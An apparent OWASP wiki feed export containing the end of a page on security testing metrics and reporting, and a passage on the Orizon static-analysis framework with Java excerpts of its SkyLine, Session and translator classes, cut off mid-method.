When security testing is done in several phases of the SDLC, the test data could prove the capability of the security tests in detecting vulnerabilities as soon as they are introduced, and prove the effectiveness of removing them by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type is also defined as “containment metrics” and provides a measure of the ability of a security assessment performed at each phase of the development process to maintain security within each phase. These containment metrics are also a critical factor in lowering the cost of fixing vulnerabilities, since it is less expensive to deal with vulnerabilities when they are found (in the same phase of the SDLC) rather than fixing them later in another phase. &lt;br /&gt;
&lt;br /&gt;
Security test metrics can support security risk, cost, and defect management analysis when they are associated with tangible and timed goals such as: &lt;br /&gt;
*Reducing the overall number of vulnerabilities by 30%&lt;br /&gt;
*Fixing security issues by a certain deadline (e.g., before beta release)&lt;br /&gt;
&lt;br /&gt;
Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well as comparative, such as the number of vulnerabilities detected in code reviews vs. penetration tests. To answer questions about the quality of the security process, it is important to determine a baseline for what could be considered acceptable and good. &lt;br /&gt;
&lt;br /&gt;
Security test data can also support specific objectives of the security analysis such as compliance with security regulations and information security standards, management of security processes, the identification of security root causes and process improvements, and security costs vs. benefits analysis.&lt;br /&gt;
&lt;br /&gt;
When security test data is reported, it has to provide metrics to support the analysis. The scope of the analysis is the interpretation of test data to find clues about the security of the software being produced, as well as the effectiveness of the process. &lt;br /&gt;
Some examples of clues supported by security test data are:&lt;br /&gt;
*Are vulnerabilities reduced to an acceptable level for release?&lt;br /&gt;
*How does the security quality of this product compare with similar software products?&lt;br /&gt;
*Are all security test requirements being met? &lt;br /&gt;
*What are the major root causes of security issues?&lt;br /&gt;
*How numerous are security flaws compared to security bugs?&lt;br /&gt;
*Which security activity is most effective in finding vulnerabilities?&lt;br /&gt;
*Which team is more productive in fixing security defects and vulnerabilities?&lt;br /&gt;
*What percentage of overall vulnerabilities are high risk?&lt;br /&gt;
*Which tools are most effective in detecting security vulnerabilities?&lt;br /&gt;
*Which kind of security test is most effective in finding vulnerabilities (e.g., white box vs. black box tests)?&lt;br /&gt;
*How many security issues are found during secure code reviews?&lt;br /&gt;
*How many security issues are found during secure design reviews?&lt;br /&gt;
&lt;br /&gt;
In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools should be used. Security tools can be qualified as being good at finding common, known vulnerabilities targeting different artifacts.&lt;br /&gt;
The issue is that unknown security issues are not tested for: the fact that a scan comes out clean does not mean that the software or application is secure. Some studies [22] have demonstrated that, at best, tools can find 45% of overall vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
Even the most sophisticated automation tools are not a match for an experienced security tester: just relying on successful test results from automation tools will give security practitioners a false sense of security.  Typically, the more experienced the security testers are with the security testing methodology and testing tools, the better the results of the security test and analysis will be. It is important that managers making an investment in security testing tools also consider an investment in hiring skilled human resources as well as security test training.&lt;br /&gt;
&lt;br /&gt;
'''Reporting Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The security posture of an application can be characterized from the perspective of the effect, such as the number of vulnerabilities and their risk ratings, as well as from the perspective of the cause (i.e., origin), such as coding errors, architectural flaws, and configuration issues.  &lt;br /&gt;
&lt;br /&gt;
Vulnerabilities can be classified according to different criteria. This can be a statistical categorization, such as the OWASP Top 10 and the WASC Web Application Security Statistics project, or one related to defensive controls, as in the case of the Web Application Security Frame (WASF) categorization.&lt;br /&gt;
&lt;br /&gt;
When reporting security test data, the best practice is to include the following information, besides the categorization of each vulnerability by type:&lt;br /&gt;
*The security threat that the issue is exposed to&lt;br /&gt;
*The root cause of the security issue (e.g., security bug, security flaw)&lt;br /&gt;
*The testing technique used to find it&lt;br /&gt;
*The remediation of the vulnerability (e.g., the countermeasure) &lt;br /&gt;
*The risk rating of the vulnerability (High, Medium, Low)&lt;br /&gt;
&lt;br /&gt;
By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective in mitigating the threat. &lt;br /&gt;
&lt;br /&gt;
Reporting the root cause of the issue can help pinpoint what needs to be fixed: in the case of white box testing, for example, the software security root cause of the vulnerability will be the offending source code. &lt;br /&gt;
&lt;br /&gt;
Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find the vulnerability. This might involve using a white box testing technique (e.g., security code review with a static code analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black box technique (penetration test), the test report also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., client).&lt;br /&gt;
&lt;br /&gt;
The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It should include secure coding examples and configuration changes, and provide adequate references.&lt;br /&gt;
&lt;br /&gt;
Finally, the risk rating helps to prioritize the remediation effort. Typically, assigning a risk rating to the vulnerability involves a risk analysis based upon factors such as impact and exposure.&lt;br /&gt;
&lt;br /&gt;
'''Business Cases'''&amp;lt;br&amp;gt; &lt;br /&gt;
For security test metrics to be useful, they need to provide value back to the organization's security test data stakeholders, such as project managers, developers, information security officers, auditors, and chief information officers. The value can be expressed in terms of the business case that each project stakeholder has, according to their role and responsibility.&lt;br /&gt;
&lt;br /&gt;
Software developers look at security test data to show that software is coded more securely and efficiently. This helps them make the case for using source code analysis tools, following secure coding standards, and attending software security training. &lt;br /&gt;
&lt;br /&gt;
Project managers look for data that allows them to successfully manage and utilize security testing activities and resources according to the project plan. To project managers, security test data can show that projects are on schedule, on target for delivery dates, and improving during tests. &lt;br /&gt;
&lt;br /&gt;
Security test data also helps the business case for security testing if the initiative comes from information security officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project delivery, but rather reduces the overall workload needed to address vulnerabilities later in production. &lt;br /&gt;
&lt;br /&gt;
To compliance auditors, security test metrics provide a level of software security assurance and confidence that security standard compliance is addressed through the security review processes within the organization. &lt;br /&gt;
&lt;br /&gt;
Finally, Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), who are responsible for the budget allocated to security resources, look to derive a cost/benefit analysis from security test data in order to make informed decisions about which security activities and tools to invest in. One of the metrics that supports such analysis is the Return On Investment (ROI) in Security [23]. To derive such metrics from security test data, it is important to quantify the differential between the risk due to the exposure of vulnerabilities and the effectiveness of the security tests in mitigating the security risk, and to factor this gap against the cost of the security testing activity or the testing tools adopted.&lt;br /&gt;
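&lt;br /&gt;
One common formulation of Return On Security Investment (not necessarily the exact model developed in [23]) compares the loss avoided by the security activity against its cost. The figures in this sketch are invented for illustration:&lt;br /&gt;

```java
// Sketch of one common Return On Security Investment (ROSI) formulation:
// ROSI = (annualLossExpectancy * mitigationRatio - cost) / cost
// The figures below are invented for illustration only.
public class RosiSketch {

    static double rosi(double annualLossExpectancy, double mitigationRatio, double cost) {
        double avoidedLoss = annualLossExpectancy * mitigationRatio;
        return (avoidedLoss - cost) / cost;
    }

    public static void main(String[] args) {
        // e.g., 200,000 expected annual loss, security testing mitigates 75% of it,
        // at a testing cost of 50,000: ROSI = (150000 - 50000) / 50000 = 2.0
        System.out.println(rosi(200000.0, 0.75, 50000.0));
    }
}
```

A positive ROSI supports the business case for the testing activity; the hard part in practice is estimating the loss expectancy and the mitigation ratio from the security test data.&lt;br /&gt;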
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] T. DeMarco, ''Controlling Software Projects: Management, Measurement and Estimation'', Yourdon Press, 1982&lt;br /&gt;
&lt;br /&gt;
[2] S. Payne, ''A Guide to Security Metrics'' - http://www.sans.org/reading_room/whitepapers/auditing/55.php&lt;br /&gt;
&lt;br /&gt;
[3] NIST, ''The economic impacts of inadequate infrastructure for software testing'' - http://www.nist.gov/public_affairs/releases/n02-10.htm&lt;br /&gt;
&lt;br /&gt;
[4] Ross Anderson, ''Economics and Security Resource Page'' - http://www.cl.cam.ac.uk/users/rja14/econsec.html &lt;br /&gt;
&lt;br /&gt;
[5] Denis Verdon, ''Teaching Developers To Fish'' - [[OWASP AppSec NYC 2004]]&lt;br /&gt;
&lt;br /&gt;
[6] Bruce Schneier, ''Cryptogram Issue #9'' - http://www.schneier.com/crypto-gram-0009.html&lt;br /&gt;
&lt;br /&gt;
[7] Symantec, ''Threat Reports'' -  http://www.symantec.com/business/theme.jsp?themeid=threatreport&lt;br /&gt;
&lt;br /&gt;
[8] FTC, ''The Gramm-Leach Bliley Act'' - http://www.ftc.gov/privacy/privacyinitiatives/glbact.html&lt;br /&gt;
&lt;br /&gt;
[9] Senator Peace and Assembly Member Simitian, ''SB 1386''- http://www.leginfo.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html&lt;br /&gt;
&lt;br /&gt;
[10] European Union, ''Directive 95/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data'' -&lt;br /&gt;
http://ec.europa.eu/justice_home/fsj/privacy/docs/95-46-ce/dir1995-46_part1_en.pdf&lt;br /&gt;
&lt;br /&gt;
[11] NIST, ''Risk Management Guide for Information Technology Systems'' - http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf&lt;br /&gt;
&lt;br /&gt;
[12] SEI, Carnegie Mellon, ''Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)'' - http://www.cert.org/octave/&lt;br /&gt;
&lt;br /&gt;
[13] Ken Thompson, ''Reflections on Trusting Trust'', reprinted from Communications of the ACM - http://cm.bell-labs.com/who/ken/trust.html&lt;br /&gt;
&lt;br /&gt;
[14] Gary McGraw, ''Beyond the Badness-ometer'' - http://www.ddj.com/security/189500001&lt;br /&gt;
&lt;br /&gt;
[15] FFIEC, ''Authentication in an Internet Banking Environment'' - http://www.ffiec.gov/pdf/authentication_guidance.pdf&lt;br /&gt;
&lt;br /&gt;
[16] PCI Security Standards Council, ''PCI Data Security Standard'' - https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml &lt;br /&gt;
&lt;br /&gt;
[17] MSDN, ''Cheat Sheet: Web Application Security Frame'' - http://msdn.microsoft.com/en-us/library/ms978518.aspx#tmwacheatsheet_webappsecurityframe &lt;br /&gt;
&lt;br /&gt;
[18] MSDN, ''Improving Web Application Security, Chapter 2, Threat And Countermeasures'' - http://msdn.microsoft.com/en-us/library/aa302418.aspx&lt;br /&gt;
&lt;br /&gt;
[19] Gil Regev, Ian Alexander,Alain Wegmann, ''Use Cases and Misuse Cases Model the Regulatory Roles of Business Processes'' - http://easyweb.easynet.co.uk/~iany/consultancy/regulatory_processes/regulatory_processes.htm&lt;br /&gt;
&lt;br /&gt;
[20] G. Sindre, A. Opdahl, ''Capturing Security Requirements Through Misuse Cases'' - http://folk.uio.no/nik/2001/21-sindre.pdf&lt;br /&gt;
&lt;br /&gt;
[21] Security Across the Software Development Lifecycle Task Force, ''Referred Data from Capers Jones, Software Assessments, Benchmarks and Best Practices'' - http://www.cyberpartnership.org/SDLCFULL.pdf&lt;br /&gt;
&lt;br /&gt;
[22] MITRE, ''Being Explicit About Weaknesses, Slide 30, Coverage of CWE'' - http://cwe.mitre.org/documents/being-explicit/BlackHatDC_BeingExplicit_Slides.ppt&lt;br /&gt;
&lt;br /&gt;
[23] Marco Morana, ''Building Security Into The Software Life Cycle, A Business Case'' - http://www.blackhat.com/presentations/bh-usa-06/bh-us-06-Morana-R3.0.pdf&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61247</id>
		<title>The Owasp Orizon Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61247"/>
				<updated>2009-05-22T13:07:43Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Reference */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
Many open source projects exist in the wild that perform static code analysis. This is good: it means that testing source code for security issues is becoming a requirement. &lt;br /&gt;
&lt;br /&gt;
Such tools bring a lot of valuable benefits:&lt;br /&gt;
* community support&lt;br /&gt;
* source code freely available to anyone&lt;br /&gt;
* low costs&lt;br /&gt;
&lt;br /&gt;
On the other hand, these tools do not share their most valuable asset: security knowledge. Each of these tools has its own security library containing a lot of checks, but that knowledge is not shared among them. &lt;br /&gt;
&lt;br /&gt;
In 2006, the Owasp Orizon project was born to provide a common underlying layer to all open source projects concerned with static analysis. &lt;br /&gt;
&lt;br /&gt;
The Orizon project includes:&lt;br /&gt;
* a set of APIs that developers can use to build their own security tools performing static analysis.&lt;br /&gt;
* a security library with checks to apply to source code.&lt;br /&gt;
* a tool, Milk, which is able to statically analyze source code using the Orizon framework.&lt;br /&gt;
&lt;br /&gt;
== The Owasp Orizon Architecture ==&lt;br /&gt;
The following picture shows the Owasp Orizon version 1.0 architecture. As you can see, the framework is organized into engines that perform tasks over the source code, plus a set of tools deployed out of the box that use the APIs for real-world static analysis. &lt;br /&gt;
&lt;br /&gt;
[[Image:Owasp_Orizon_Architecture_v1.0.png|400px|The Owasp Orizon v1.0 architecture]]&lt;br /&gt;
&lt;br /&gt;
With all these elements, a developer might be intimidated by the framework; that is why a special entity called SkyLine was created. Before going further into SkyLine, it is important to understand all the elements Orizon is made of. &lt;br /&gt;
&lt;br /&gt;
=== Your personal butler: the SkyLine class ===&lt;br /&gt;
Named '''core''' in the architectural picture, the SkyLine object is one of the most valuable services in Orizon version 1.0. &lt;br /&gt;
&lt;br /&gt;
The idea behind SkyLine is simple: as the Orizon architecture becomes wider, developers may be daunted by having to understand a lot of APIs in order to build their security tool, so we help them by providing &amp;quot;per service&amp;quot; support. &lt;br /&gt;
&lt;br /&gt;
Using the SkyLine object, developers can request services from the Orizon framework and wait for their completion. &lt;br /&gt;
&lt;br /&gt;
The main SkyLine entry point is: &lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service)'''&lt;br /&gt;
&lt;br /&gt;
Passing the requested service as a string parameter, the calling program receives a boolean return value: true if the service can be accomplished, false otherwise. &lt;br /&gt;
&lt;br /&gt;
The service name is compared to the ones understood by the framework: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''private int goodService(String service) {&lt;br /&gt;
 '''  int ret = -1;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;init&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_FRAMEWORK;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;translate&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_TRANSLATE;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;static_analysis&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_STATIC_ANALYSIS;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;score&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_SCORE;&lt;br /&gt;
 '''  return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
The secondary feature introduced in this first major framework release is support for command line options given by the user. &lt;br /&gt;
&lt;br /&gt;
If the calling program passes command line options to the Orizon framework using SkyLine, the framework will be tuned according to the given values. &lt;br /&gt;
&lt;br /&gt;
The following example explains this better: &lt;br /&gt;
&lt;br /&gt;
 '''public static void main(String[] args) {&lt;br /&gt;
 '''   String fileName = &amp;quot;&amp;quot;;&lt;br /&gt;
 '''   OldRecipe r;&lt;br /&gt;
 '''   DefaultLibrary dl;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   SkyLine skyLine = new SkyLine(args);&lt;br /&gt;
&lt;br /&gt;
That's all, folks! Internally, the SkyLine constructor, when it creates a code review session, uses the values it was able to understand from the command line. &lt;br /&gt;
&lt;br /&gt;
The command line format must follow this convention: &lt;br /&gt;
&lt;br /&gt;
 ''' -o orizon_key=value&lt;br /&gt;
or the long format&lt;br /&gt;
 ''' --orizon orizon_key=value&lt;br /&gt;
&lt;br /&gt;
And these are the keys that the framework cares about:&lt;br /&gt;
* &amp;quot;input-name&amp;quot;&lt;br /&gt;
* &amp;quot;input-kind&amp;quot;&lt;br /&gt;
* &amp;quot;working-dir&amp;quot;&lt;br /&gt;
* &amp;quot;lang&amp;quot;&lt;br /&gt;
* &amp;quot;recurse&amp;quot;&lt;br /&gt;
* &amp;quot;output-format&amp;quot;&lt;br /&gt;
* &amp;quot;scan-type&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
The org.owasp.orizon.Cons class contains a detailed section about these keys, with comments and their default values.&lt;br /&gt;
&lt;br /&gt;
The only side effect is that the calling program cannot use the -o flag for its own purposes.&lt;br /&gt;
 &lt;br /&gt;
SkyLine is contained in the org.owasp.orizon package.&lt;br /&gt;
&lt;br /&gt;
=== Give me something to remember: the Session class ===&lt;br /&gt;
Another big feature introduced in Owasp Orizon version 1.0 is the code review session concept. One of the missing features in earlier versions was the capability to track the state of the code review process. &lt;br /&gt;
&lt;br /&gt;
A Session class instance contains all the properties specified using SkyLine; it owns them and gives access to them upon request. It also contains a SessionInfo array holding information about each file being reviewed. &lt;br /&gt;
&lt;br /&gt;
Ideally, a user tool will never call Session directly, but should use SkyLine as its interface. Of course, anyone is free to ignore this suggestion. &lt;br /&gt;
&lt;br /&gt;
Looking at the launch() method code inside the SkyLine class, you can see how the session instance is asked to execute services. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service) {&lt;br /&gt;
 '''   int code, stats;&lt;br /&gt;
 '''   boolean ret = false;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   if ( (code = goodService(service)) == -1)&lt;br /&gt;
 '''      return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''   switch (code) {&lt;br /&gt;
 '''       // init service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_FRAMEWORK:&lt;br /&gt;
 '''            ret = session.init();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // translation service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_TRANSLATE:&lt;br /&gt;
 '''            stats = session.collectStats();&lt;br /&gt;
 '''            if (stats &amp;gt; 0) {&lt;br /&gt;
 '''               log.warning(stats + &amp;quot; files failed in collecting statistics.&amp;quot;);&lt;br /&gt;
 '''               ret = false;&lt;br /&gt;
 '''            } else&lt;br /&gt;
 '''               ret = true;&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // static analysis service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_STATIC_ANALYSIS:&lt;br /&gt;
 '''            ret = session.staticReview();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // score service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_SCORE:&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       default:&lt;br /&gt;
 '''            return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''       }&lt;br /&gt;
 '''       return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Internally, the Session instance will ask each SessionInfo object to execute services. Let us consider the Session class method that executes the static analysis service. &lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Starts a static analysis over the files being reviewed&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if static analysis can be performed or &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt;&lt;br /&gt;
 '''  *         if one or more files fail being analyzed.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''public boolean staticReview() {&lt;br /&gt;
 '''   boolean ret = true;&lt;br /&gt;
 '''   if (!active)&lt;br /&gt;
 '''      return log.error(&amp;quot;can't perform a static analysis over an inactive session.&amp;quot;);&lt;br /&gt;
 '''   for (int i = 0; i &amp;lt; sessions.length; i++) {&lt;br /&gt;
 '''       if (! sessions[i].staticReview())&lt;br /&gt;
 '''          ret = false;&lt;br /&gt;
 '''   }&lt;br /&gt;
 '''   return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Where the sessions variable is declared as:&lt;br /&gt;
 '''private SessionInfo[] sessions;&lt;br /&gt;
&lt;br /&gt;
As you can see, the Session object delegates service execution to SessionInfo objects and then collects the final results. &lt;br /&gt;
&lt;br /&gt;
In fact, SessionInfo objects are the ones that talk with the Orizon internals and perform the real work. &lt;br /&gt;
&lt;br /&gt;
The following method is taken from the org.owasp.orizon.SessionInfo class. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Perform a static analysis over the given file&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * A full static analysis is a mix from:&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  *  * local analysis (control flow)&lt;br /&gt;
 '''  *  * global analysis (call graph)&lt;br /&gt;
 '''  *  * taint propagation&lt;br /&gt;
 '''  *  * statistics&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if the file being reviewed doesn't violate any&lt;br /&gt;
 '''  *         security check, &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt; otherwise.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''  public boolean staticReview() {&lt;br /&gt;
 '''     boolean ret = false;&lt;br /&gt;
 '''     s = new Source(getStatFileName());&lt;br /&gt;
 '''     ret = s.analyzeStats();&lt;br /&gt;
 '''     ...&lt;br /&gt;
 '''     return ret;&lt;br /&gt;
 '''  }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== The Translation Factory ===&lt;br /&gt;
One of the Owasp Orizon goals is to be independent of the source language being analyzed. This means that Owasp Orizon will support: &lt;br /&gt;
* Java&lt;br /&gt;
* C, C++&lt;br /&gt;
* C#&lt;br /&gt;
* Perl&lt;br /&gt;
* ...&lt;br /&gt;
Such support is achieved by using an intermediate file format that describes the source code and to which the security checks are applied. This format is XML. &lt;br /&gt;
&lt;br /&gt;
Before static analysis starts, the source code is translated into XML. Starting from version 1.0, each source file is translated into four XML files: &lt;br /&gt;
&lt;br /&gt;
* an XML file containing statistical information&lt;br /&gt;
* an XML file containing variable tracking information&lt;br /&gt;
* an XML file containing program control flow (local analysis)&lt;br /&gt;
* an XML file containing call graph (global analysis)&lt;br /&gt;
&lt;br /&gt;
At the time this document was written (Owasp Orizon v1.0pre1, September 2008), only the Java programming language is supported; support for other programming languages will follow soon. &lt;br /&gt;
&lt;br /&gt;
The translation phase is requested by the org.owasp.orizon.SessionInfo.inspect() method. Depending on the source file language, the appropriate Translator is instantiated and its scan() method is called. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' /**&lt;br /&gt;
 '''   * Inspects the source code, building AST trees&lt;br /&gt;
 '''   * @return&lt;br /&gt;
 '''   */&lt;br /&gt;
 '''   public boolean inspect() {&lt;br /&gt;
 '''      boolean ret = false;&lt;br /&gt;
 '''      switch (language) {&lt;br /&gt;
 '''         case Cons.O_JAVA:&lt;br /&gt;
 '''             t = new JavaTranslator();&lt;br /&gt;
 '''             if (!t.scan(getInFileName())) &lt;br /&gt;
 '''                return log.error(&amp;quot;can't scan &amp;quot; + getInFileName() + &amp;quot;.&amp;quot;);&lt;br /&gt;
 '''                ret = true;&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''         default:&lt;br /&gt;
 '''             log.error(&amp;quot;can't inspect language: &amp;quot; + Cons.name(language));&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''      }&lt;br /&gt;
 '''      return ret;&lt;br /&gt;
 '''   }&lt;br /&gt;
&lt;br /&gt;
The scan() method is an abstract method defined in the org.owasp.orizon.translator.DefaultTranslator class and declared as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean scan(String in);&lt;br /&gt;
&lt;br /&gt;
Every class extending DefaultTranslator must implement in this method how to scan the source file and build the ASTs. &lt;br /&gt;
&lt;br /&gt;
Aside from the scan() method, there are four abstract methods needed to create the XML input files. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean statService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean callGraphService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean dataFlowService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean controlFlowService(String in, String out);&lt;br /&gt;
&lt;br /&gt;
All these methods are called in the translate() method, the one implemented directly in the DefaultTranslator class. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean translate(String in, String out, int service) {&lt;br /&gt;
 '''    if (!isGoodService(service))&lt;br /&gt;
 '''       return false;&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       if (!scan(in))&lt;br /&gt;
 '''          return log.error(in+ &amp;quot;: scan has been failed&amp;quot;);&lt;br /&gt;
 '''    switch (service) {&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_STAT:&lt;br /&gt;
 '''          return statService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CF:&lt;br /&gt;
 '''          return controlFlowService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CG:&lt;br /&gt;
 '''          return callGraphService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_DF:&lt;br /&gt;
 '''          return dataFlowService(in, out);&lt;br /&gt;
 '''      default:&lt;br /&gt;
 '''          return log.error(&amp;quot;unknown service code&amp;quot;);&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
So, when a language-specific translator's translate() method is invoked, it calls the language-specific service methods. &lt;br /&gt;
&lt;br /&gt;
Every translator contains, as a private field, a language-specific scanner holding the ASTs to be used in input file generation. &lt;br /&gt;
&lt;br /&gt;
Consider the org.owasp.orizon.translator.java.JavaTranslator class; it is declared as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public class JavaTranslator extends DefaultTranslator {&lt;br /&gt;
 '''   static SourcePositions positions;&lt;br /&gt;
 '''   private JavaScanner j;&lt;br /&gt;
 '''   ...&lt;br /&gt;
&lt;br /&gt;
JavaScanner is a class from the org.owasp.orizon.translator.java package; it uses the Sun JDK 6 Compiler API to scan a Java file, creating in-memory ASTs. The trees are created in the scan() method, implemented for the Java source language as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean scan(String in) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 '''    String[] parms = { in };&lt;br /&gt;
 '''    Trees trees;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();&lt;br /&gt;
 '''    if (compiler == null) &lt;br /&gt;
 '''       return log.error(&amp;quot;I can't find a suitable JAVA compiler. Is a JDK installed?&amp;quot;);&lt;br /&gt;
 ''' 	&lt;br /&gt;
 '''    DiagnosticCollector&amp;lt;JavaFileObject&amp;gt; diagnostics = new DiagnosticCollector&amp;lt;JavaFileObject&amp;gt;();&lt;br /&gt;
 '''    StandardJavaFileManager fileManager = compiler.getStandardFileManager(diagnostics, null, null);&lt;br /&gt;
 '''    Iterable&amp;lt;? extends JavaFileObject&amp;gt; fileObjects = fileManager.getJavaFileObjects(parms);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    JavacTask task = (com.sun.source.util.JavacTask) compiler.getTask(null,fileManager, diagnostics, null, null, fileObjects);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        trees = Trees.instance(task);&lt;br /&gt;
 '''        positions = trees.getSourcePositions();&lt;br /&gt;
 '''        Iterable&amp;lt;? extends CompilationUnitTree&amp;gt; asts = task.parse();&lt;br /&gt;
 '''        for (CompilationUnitTree ast : asts) {&lt;br /&gt;
 '''            j = new JavaScanner(positions, ast);&lt;br /&gt;
 '''            j.scan(ast, null);&lt;br /&gt;
 '''        }&lt;br /&gt;
 '''        scanned = true;&lt;br /&gt;
 '''        return true;&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        return log.fatal(&amp;quot;an exception occurred while translating &amp;quot; + in + &amp;quot;: &amp;quot; + e.getLocalizedMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
=== Statistical Gathering ===&lt;br /&gt;
To implement statistical information gathering, the DefaultTranslator abstract method statService() must be implemented. The following example shows the JavaTranslator implementation. Statistical information is stored in the JavaScanner object itself and retrieved by the getStats() method. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean statService(String in, String out) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       return log.error(in + &amp;quot;: call scan() before asking translation...&amp;quot;);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Entering statService(): collecting stats for: &amp;quot; + in);&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        createXmlFile(out);&lt;br /&gt;
 '''        xmlInit();&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;source name=\&amp;quot;&amp;quot; + in+&amp;quot;\&amp;quot; &amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xml(j.getStats());&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;/source&amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xmlEnd();&lt;br /&gt;
 '''&lt;br /&gt;
 '''        ret = true;&lt;br /&gt;
 '''        log.debug(&amp;quot;stats written into: &amp;quot; + out);&lt;br /&gt;
 '''    } catch (FileNotFoundException e) {&lt;br /&gt;
 '''        log.error(&amp;quot;an exception occurred: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    } catch (UnsupportedEncodingException e) {&lt;br /&gt;
